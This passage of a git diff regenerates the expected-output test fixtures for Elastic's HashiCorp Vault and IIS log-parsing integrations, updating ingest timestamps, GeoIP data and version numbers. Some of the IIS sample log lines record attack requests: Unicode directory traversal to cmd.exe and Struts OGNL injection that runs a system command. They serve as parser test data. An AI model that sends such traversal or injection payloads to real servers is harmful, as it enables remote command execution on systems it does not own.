ac-sha256:e38035c165f0076d9288ba0363eb36733379cc5d370bec5e82f11632519c26a8\",\"entity_id\":\"hmac-sha256:2fced7e2c77266f5079d733bea71dc8c8413d3838584ca9d0f4867271df7a220\",\"expire_time\":\"2023-12-23T05:01:22.8929692Z\",\"explicit_max_ttl\":0,\"id\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"issue_time\":\"2018-04-09T21:01:22.8929624Z\",\"meta\":{\"loglevel\":\"hmac-sha256:eac4a7deb2df94609ab14ae48b9edea81d91de51be1dd59df6ca6852537227c5\",\"remote\":\"hmac-sha256:aa2d1dd64d4468bbd9c6b0ca275cdffb7473a2d91b5f42a047161620245fcc79\",\"surf\":\"hmac-sha256:8b29af9294da23c72de8d8d847ccebd450d978af5565807d0c9922b6b2e92988\"},\"num_uses\":0,\"orphan\":false,\"path\":\"hmac-sha256:36ea987a227a2c7aefe055a98f99751383f601955e9f1925bd3c2d6f9931a025\",\"policies\":[\"hmac-sha256:451623ebbe12fb9b1b3f444ceb5a5a46102452e46d640925c7b0dcb93a65a99a\",\"hmac-sha256:9a76c609b073848f2d9cb4a7fcddfc2103c0063480b87a9ee585e9e072e901d9\",\"hmac-sha256:8924f876eca967c68bbc8ac138e9f876f2144e300c08b1898224fc76902c1fe3\"],\"renewable\":true,\"ttl\":179999812}},\"error\":\"\"}", "kind": "event", "action": "read", @@ -233,7 +233,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-09T13:39:31.476476900Z", + "ingested": "2021-12-14T14:46:43.994437841Z", "original": "{\"time\":\"2021-07-21T12:37:50.93608Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:3aae134b7843218bf089cd9b01a55ec417346a242b5383a7fac2ab49692f403a\",\"accessor\":\"bar\",\"display_name\":\"testtoken\",\"policies\":[\"root\"],\"token_policies\":[\"web\"],\"identity_policies\":[\"ident1\",\"ident2\"],\"external_namespace_policies\":{\"ns1\":[\"baz\"]},\"no_default_policy\":true,\"metadata\":{\"id\":\"007\"},\"remaining_uses\":5,\"entity_id\":\"foobarentity\",\"token_type\":\"service\",\"token_ttl\":14400,\"token_issue_time\":\"2020-05-28T13:40:18-05:00\"},\"request\":{\"id\":\"002c8225-e859-44a0-9ccb-471c3655dbd8\",\"operation\":\"update\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:e890f27c5ee11e26bda7c8e6ec218af451a6b1e35f9fe6d0676f1b29889b406c\",\"client_token_accessor\":\"35e2f256-0fc3-4eea-9405-3e212435b6c7\",\"namespace\":{\"id\":\"root\"},\"path\":\"secrets/foo\",\"data\":{\"data\":\"hmac-sha256:46c0fd3146d89ff602279417df7ac9267ce58fa3c6d2535d2d9050a5323c21ec\"},\"policy_override\":true,\"remote_address\":\"127.0.0.1\",\"wrap_ttl\":3600,\"headers\":{\"foo\":[\"bar\"]}},\"error\":\"this is an error\"}", "kind": "event", "action": "update", @@ -371,7 +371,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-09T13:39:31.476482600Z", + "ingested": "2021-12-14T14:46:43.994438242Z", "original": "{\"time\":\"2021-07-21T12:37:50.936443Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:3aae134b7843218bf089cd9b01a55ec417346a242b5383a7fac2ab49692f403a\",\"accessor\":\"bar\",\"display_name\":\"testtoken\",\"policies\":[\"root\"],\"token_policies\":[\"web\"],\"identity_policies\":[\"ident1\",\"ident2\"],\"external_namespace_policies\":{\"ns1\":[\"baz\"]},\"no_default_policy\":true,\"metadata\":{\"id\":\"007\"},\"remaining_uses\":5,\"entity_id\":\"foobarentity\",\"token_type\":\"service\",\"token_ttl\":14400,\"token_issue_time\":\"2020-05-28T13:40:18-05:00\"},\"request\":{\"id\":\"002c8225-e859-44a0-9ccb-471c3655dbd8\",\"operation\":\"update\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:e890f27c5ee11e26bda7c8e6ec218af451a6b1e35f9fe6d0676f1b29889b406c\",\"client_token_accessor\":\"35e2f256-0fc3-4eea-9405-3e212435b6c7\",\"namespace\":{\"id\":\"root\"},\"path\":\"secrets/foo\",\"data\":{\"data\":\"hmac-sha256:46c0fd3146d89ff602279417df7ac9267ce58fa3c6d2535d2d9050a5323c21ec\"},\"policy_override\":true,\"remote_address\":\"127.0.0.1\",\"wrap_ttl\":3600,\"headers\":{\"foo\":[\"bar\"]}},\"response\":{\"auth\":{\"client_token\":\"hmac-sha256:3aae134b7843218bf089cd9b01a55ec417346a242b5383a7fac2ab49692f403a\",\"accessor\":\"bar\",\"display_name\":\"testtoken\",\"policies\":[\"root\"],\"token_policies\":[\"web\"],\"identity_policies\":[\"ident1\",\"ident2\"],\"external_namespace_policies\":{\"ns1\":[\"baz\"]},\"no_default_policy\":true,\"metadata\":{\"id\":\"007\"},\"entity_id\":\"foobarentity\",\"token_type\":\"service\",\"token_ttl\":14400,\"token_issue_time\":\"2020-05-28T13:40:18-05:00\"},\"mount_type\":\"kv\",\"data\":{\"certificate\":\"hmac-sha256:cb232c6394c9149b7f06f85e8ed9fcc55b7d1db82dd0ec1d321d0a83a7adda01\"},\"redirect\":\"redirect\",\"wrap_info\":{\"ttl\":3600,\"token\":\"hmac-sha256:09dff0fdb8db56293383d7d0347afdf64ceb672cb9aea2c66edd802bcd714094\",\"accessor\":\"xzW2I9CMqcALsllhYvqtlsvq\",\"creation_time\":\"2020-05-28T18:40:18Z\",\"creation_path\":\"auth/token/create\",\"wrapped_accessor\":\"Bh57rT8zuhspG9APjXpGpiAJ\"},\"headers\":{\"Extra-Extra\":[\"read\"]}},\"error\":\"this is an error\"}", "kind": "event", "action": "update", diff --git a/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json b/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json index f7e698bf375..59165e5e2c5 100644 --- a/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json +++ b/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json @@ -16,7 +16,7 @@ "logger": "expiration" }, "event": { - "ingested": "2021-12-09T13:39:31.823398800Z", + "ingested": "2021-12-14T14:46:44.340880919Z", "kind": "event", "original": "{\"@level\":\"error\",\"@message\":\"failed to revoke lease\",\"@module\":\"expiration\",\"@timestamp\":\"2021-07-16T06:30:48.194192Z\",\"error\":\"failed to revoke entry: resp: (*logical.Response)(nil) err: RequestError: send request failed\\ncaused by: Post \\\"https://iam.amazonaws.com/\\\": dial tcp: lookup iam.amazonaws.com on 192.168.50.34:53: server misbehaving\",\"lease_id\":\"aws/creds/ddns-updater/oS5t84TSPRoYF2gX8McPyw4u\"}" }, @@ -40,7 +40,7 @@ "logger": "expiration" }, "event": { - "ingested": "2021-12-09T13:39:31.823409400Z", + "ingested": "2021-12-14T14:46:44.340883404Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"revoked lease\",\"@module\":\"expiration\",\"@timestamp\":\"2021-07-16T06:33:08.867457Z\",\"lease_id\":\"auth/token/create/nomad-cluster/h15d750323d62439265743da0f02537e763b1968ba586b27770bd5262c9891a47\"}" }, @@ -68,7 +68,7 @@ "logger": "core.cluster-listener" }, "event": { - "ingested": "2021-12-09T13:39:31.823413700Z", + "ingested": "2021-12-14T14:46:44.340883903Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"serving cluster requests\",\"@module\":\"core.cluster-listener\",\"@timestamp\":\"2021-07-09T17:20:27.184340Z\",\"cluster_listen_address\":{\"IP\":\"::\",\"Port\":8201,\"Zone\":\"\"}}" }, @@ -92,7 +92,7 @@ "logger": "storage.raft" }, "event": { - "ingested": "2021-12-09T13:39:31.823418500Z", + "ingested": "2021-12-14T14:46:44.340884290Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"creating Raft\",\"@module\":\"storage.raft\",\"@timestamp\":\"2021-07-09T17:20:27.190451Z\",\"config\":\"\\u0026raft.Config{ProtocolVersion:3, HeartbeatTimeout:5000000000, ElectionTimeout:5000000000, CommitTimeout:50000000, MaxAppendEntries:64, BatchApplyCh:false, ShutdownOnRemove:true, TrailingLogs:0x2800, SnapshotInterval:120000000000, SnapshotThreshold:0x2000, LeaderLeaseTimeout:2500000000, LocalID:\\\"compute03-example-com\\\", NotifyCh:(chan\\u003c- bool)(0x4000324070), LogOutput:io.Writer(nil), LogLevel:\\\"DEBUG\\\", Logger:(*hclog.interceptLogger)(0x400057f2f0), NoSnapshotRestoreOnStart:true, skipStartup:false}\"}" }, @@ -120,7 +120,7 @@ "logger": "core.cluster-listener.tcp" }, "event": { - "ingested": "2021-12-09T13:39:31.823424400Z", + "ingested": "2021-12-14T14:46:44.340884654Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"starting listener\",\"@module\":\"core.cluster-listener.tcp\",\"@timestamp\":\"2021-07-09T17:20:27.182327Z\",\"listener_address\":{\"IP\":\"0.0.0.0\",\"Port\":8201,\"Zone\":\"\"}}" }, @@ -145,7 +145,7 @@ "logger": "storage.raft" }, "event": { - "ingested": "2021-12-09T13:39:31.823430200Z", + "ingested": "2021-12-14T14:46:44.340885023Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"initial configuration\",\"@module\":\"storage.raft\",\"@timestamp\":\"2021-07-09T17:20:27.212828Z\",\"index\":7788,\"servers\":\"[{Suffrage:Voter ID:compute03-example-com Address:192.168.50.36:8201} {Suffrage:Voter ID:compute02-example-com Address:192.168.50.35:8201} {Suffrage:Voter ID:compute01-example-com Address:192.168.50.34:8201}]\"}" }, @@ -170,7 +170,7 @@ "logger": "storage.raft" }, "event": { - "ingested": "2021-12-09T13:39:31.823434300Z", + "ingested": "2021-12-14T14:46:44.340885409Z", "kind": "event", "original": "{\"@level\":\"warn\",\"@message\":\"failed to contact\",\"@module\":\"storage.raft\",\"@timestamp\":\"2021-07-09T17:04:06.945541Z\",\"server-id\":\"compute03-example-com\",\"time\":4959141198}" }, @@ -194,7 +194,7 @@ "logger": "core.raft" }, "event": { - "ingested": "2021-12-09T13:39:31.823438400Z", + "ingested": "2021-12-14T14:46:44.340885785Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"installed new raft TLS key\",\"@module\":\"core.raft\",\"@timestamp\":\"2021-07-16T19:05:02.795425Z\",\"term\":402}" }, @@ -219,7 +219,7 @@ "level": "info" }, "event": { - "ingested": "2021-12-09T13:39:31.823441900Z", + "ingested": "2021-12-14T14:46:44.340886155Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"proxy environment\",\"@timestamp\":\"2021-07-09T17:01:42.203665Z\",\"http_proxy\":\"\",\"https_proxy\":\"\",\"no_proxy\":\"\"}" }, @@ -243,7 +243,7 @@ "logger": "audit" }, "event": { - "ingested": "2021-12-09T13:39:31.823446400Z", + "ingested": "2021-12-14T14:46:44.340886517Z", "kind": "event", "original": "{\"@level\":\"debug\",\"@message\":\"adding reload function\",\"@module\":\"audit\",\"@timestamp\":\"2021-07-22T17:33:20.689412Z\",\"path\":\"file/\"}" }, @@ -271,7 +271,7 @@ "logger": "audit" }, "event": { - "ingested": "2021-12-09T13:39:31.823452200Z", + "ingested": "2021-12-14T14:46:44.340886882Z", "kind": "event", "original": "{\"@level\":\"debug\",\"@message\":\"file backend options\",\"@module\":\"audit\",\"@timestamp\":\"2021-07-22T17:33:20.689526Z\",\"file_path\":\"/vault/logs/audit.json\",\"path\":\"file/\"}" }, @@ -296,7 +296,7 @@ "logger": "core" }, "event": { - "ingested": "2021-12-09T13:39:31.823458400Z", + "ingested": "2021-12-14T14:46:44.340887461Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"enabled audit backend\",\"@module\":\"core\",\"@timestamp\":\"2021-07-22T17:33:20.691959Z\",\"path\":\"file/\",\"type\":\"file\"}" }, diff --git a/packages/hashicorp_vault/manifest.yml b/packages/hashicorp_vault/manifest.yml index e156af8d443..f0bcd7b0d17 100644 --- a/packages/hashicorp_vault/manifest.yml +++ b/packages/hashicorp_vault/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: hashicorp_vault title: Hashicorp Vault -version: 1.2.1 +version: 1.2.2 license: basic description: Collect logs and metrics from Hashicorp Vault with Elastic Agent. type: integration diff --git a/packages/iis/changelog.yml b/packages/iis/changelog.yml index 3d9b232003e..6ad69ffba95 100644 --- a/packages/iis/changelog.yml +++ b/packages/iis/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.8.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.8.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json index 85808183cd4..4d00d27202c 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json @@ -46,7 +46,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:33.179061100Z", + "ingested": "2021-12-14T14:46:45.758473813Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /pbserver/..À¯..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe /c+dir+c:\\+/OG 8080 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 64 0", "kind": "event", "category": [ @@ -118,7 +118,7 @@ }, "event": { "duration": 46000000, - "ingested": "2021-12-09T13:39:33.179069800Z", + "ingested": "2021-12-14T14:46:45.758476211Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /pbserver/..ÁÁ..ÁÁ..ÁÁ..ÁÁ..ÁÁ../winnt/system32/cmd.exe /c+dir+c:\\+/OG 8080 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 2 46", "kind": "event", "category": [ @@ -188,7 +188,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:33.179075800Z", + "ingested": "2021-12-14T14:46:45.758476649Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /Director - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0", "kind": "event", "category": [ @@ -258,7 +258,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:33.179081600Z", + "ingested": "2021-12-14T14:46:45.758477019Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET / - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0", "kind": "event", "category": [ @@ -330,7 +330,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-12-09T13:39:33.179087400Z", + "ingested": "2021-12-14T14:46:45.758477459Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /pbserver/..Áœ..Áœ..Áœ..Áœ..Áœ../winnt/system32/cmd.exe /c+dir+c:\\+/OG 8080 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 64 15", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json index 1a6cef5e3a7..2e2edcb66ca 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json @@ -44,7 +44,7 @@ }, "event": { "duration": 792000000, - "ingested": "2021-12-09T13:39:34.018260800Z", + "ingested": "2021-12-14T14:46:46.663915440Z", "original": "2018-08-28 18:24:25 [10.100.220.70](http://10.100.220.70) GET / - 80 - [10.100.118.31](http://10.100.118.31) Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.3;+WOW64;+Trident/7.0;+.NET4.0E;+.NET4.0C;+.NET+CLR+3.5.30729;+.NET+CLR[+2.0.50727](tel:+2050727);+.NET+CLR+3.0.30729) 404 4 2 792", "kind": "event", "category": [ @@ -114,7 +114,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-12-09T13:39:34.018269200Z", + "ingested": "2021-12-14T14:46:46.663932266Z", "original": "2019-03-06 18:43:17 10.0.140.107 GET /health-monitoring - 80 - 10.0.140.2 - 200 0 0 15", "kind": "event", "category": [ @@ -171,7 +171,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-12-09T13:39:34.018275Z", + "ingested": "2021-12-14T14:46:46.663932660Z", "original": "2019-03-06 18:43:17 10.0.140.107 GET /health-monitoring - 80 - 10.0.140.2 - 200 0 0 15", "kind": "event", "category": [ @@ -194,18 +194,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" @@ -243,7 +237,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-12-09T13:39:34.018280500Z", + "ingested": "2021-12-14T14:46:46.663932997Z", "original": "2019-03-06 18:43:17 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 GET /health-monitoring - 80 - 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 - 200 0 0 15", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json index 66b85833c29..9ce001bd959 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log-expected.json @@ -8,6 +8,18 @@ "ip": "127.0.0.1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -45,7 +57,7 @@ }, "event": { "duration": 123000000, - "ingested": "2021-12-09T13:39:34.416760400Z", + "ingested": "2021-12-14T14:46:47.087874836Z", "original": "2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 67.43.156.13 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123", "kind": "event", "category": [ @@ -121,7 +133,7 @@ }, "event": { "duration": 789000000, - "ingested": "2021-12-09T13:39:34.416769800Z", + "ingested": "2021-12-14T14:46:47.087877193Z", "original": "2018-01-01 09:10:11 W3SVC1 GET / - 80 - 127.0.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - - example.com 200 0 0 123 456 789", "category": [ "web" @@ -152,6 +164,18 @@ "ip": "127.0.0.1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -198,7 +222,7 @@ }, "event": { "duration": 789000000, - "ingested": "2021-12-09T13:39:34.416775900Z", + "ingested": "2021-12-14T14:46:47.087877641Z", "original": "2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 67.43.156.13 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789", "kind": "event", "category": [ @@ -269,7 +293,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:34.416781800Z", + "ingested": "2021-12-14T14:46:47.087877995Z", "original": "2018-12-31 12:52:33 10.44.0.136 GET / redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.getSession().getServletContext().getRealPath('/'),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()} 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0", "kind": "event", "category": [ @@ -338,7 +362,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:34.416787800Z", + "ingested": "2021-12-14T14:46:47.087878356Z", "original": "2018-12-31 12:52:33 10.44.0.136 GET /${#context['xwork.MethodAccessor.denyMethodExecution']=!(#_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('ipconfig').waitFor()}.action - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 2 0", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json index d4514daef9c..6e5865fd684 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-ipv6zone.log-expected.json @@ -55,7 +55,7 @@ }, "event": { "duration": 789000000, - "ingested": "2021-12-09T13:39:35.246884600Z", + "ingested": "2021-12-14T14:46:48.042607327Z", "original": "2018-01-01 10:11:12 W3SVC1 MACHINE-NAME ::1%0 GET / - 80 - ::1%0 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json index 0dc93bc622f..6202cfd086c 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for-extended.log-expected.json @@ -60,7 +60,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:35.443415300Z", + "ingested": "2021-12-14T14:46:48.252503682Z", "original": "2020-10-04 22:00:34 W3SVC2 freca1 10.24.129.162 GET /favicon.ico - 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - https://images.hogeschoolrotterdam.nl/Blob/adeec119008c48758c1a6be53aeeb2ac/34ff475072d54117bcb46ea7f023bd87.jpg?width=1200\u0026height=630\u0026mode=crop images.hogeschoolrotterdam.nl 404 0 2 1437 534 0 67.43.156.14", "kind": "event", "category": [ @@ -145,7 +145,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:35.443423700Z", + "ingested": "2021-12-14T14:46:48.252506257Z", "original": "2020-10-05 21:40:30 W3SVC2 freca1 10.24.129.162 GET /robots.txt - 80 - 10.24.136.240 HTTP/1.1 Twitterbot/1.0 - - images.hogeschoolrotterdam.nl 200 0 0 346 306 0 67.43.156.14", "kind": "event", "category": [ @@ -228,7 +228,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-12-09T13:39:35.443429200Z", + "ingested": "2021-12-14T14:46:48.252506775Z", "original": "2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/9/e/1/c/3/7/9e1c37a203a2a306e8f5d4df1bddb1109dd42e57.jpg width=35\u0026height=38\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMsadfHHYQAGkWEWnyAqAads=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2007 581 15 67.43.156.14", "kind": "event", "category": [ @@ -316,7 +316,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:35.443434600Z", + "ingested": "2021-12-14T14:46:48.252507180Z", "original": "2020-10-05 21:48:33 W3SVC2 freca1 10.24.129.162 GET /app_data/cache/f/b/7/1/2/7/fb71277260ae26a108c3608ce1a62474a55b2556.jpg width=75\u0026height=40\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 BIGipServerYAkgvoMHHYQAGkWEWadfsadfnyAqAere=27246369425.20480.0000 https://www.rotterdamuas.com/ images.hogeschoolrotterdam.nl 200 0 0 2926 581 0 67.43.156.14", "kind": "event", "category": [ @@ -404,7 +404,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-12-09T13:39:35.443440100Z", + "ingested": "2021-12-14T14:46:48.252507584Z", "original": "2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/a9e2fe596ac14a4ab07beb6b6e2c6545/15a3917cacf44de59af9cc899e90a9d4.png width=60\u0026height=20\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504478161.16021944379;+_gat_UA-155746052-5=1;+BIGipServerYAkgvoMHHYQAGkWsadfsdfEWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYaferu1dRyQoUTVVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 15 67.43.156.14", "kind": "event", "category": [ @@ -492,7 +492,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:35.443445300Z", + "ingested": "2021-12-14T14:46:48.252507970Z", "original": "2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/ff64cd9efcf4424dbf06b3b8133eeea2/f2e0b2998b1f43cb98e5b31c7faa91f4.jpg width=60\u0026height=20\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504748161.16021944379;+_gat_UA-155764052-5=1;+BIGipServerYAkgvoMHHYQAGkWEsadfsdfsWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYu1dRyQoUTVerwerVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 0 67.43.156.14", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json index 23aa1ecfdc8..1fced876992 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json @@ -48,7 +48,7 @@ }, "event": { "duration": 26000000, - "ingested": "2021-12-09T13:39:36.546140500Z", + "ingested": "2021-12-14T14:46:49.526779223Z", "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 26 192.168.198.23", "kind": "event", "category": [ @@ -122,7 +122,7 @@ }, "event": { "duration": 32000000, - "ingested": "2021-12-09T13:39:36.546153400Z", + "ingested": "2021-12-14T14:46:49.526782023Z", "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23", "kind": "event", "category": [ @@ -196,7 +196,7 @@ }, "event": { "duration": 46000000, - "ingested": "2021-12-09T13:39:36.546173100Z", + "ingested": "2021-12-14T14:46:49.526782477Z", "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadJETotals - 443 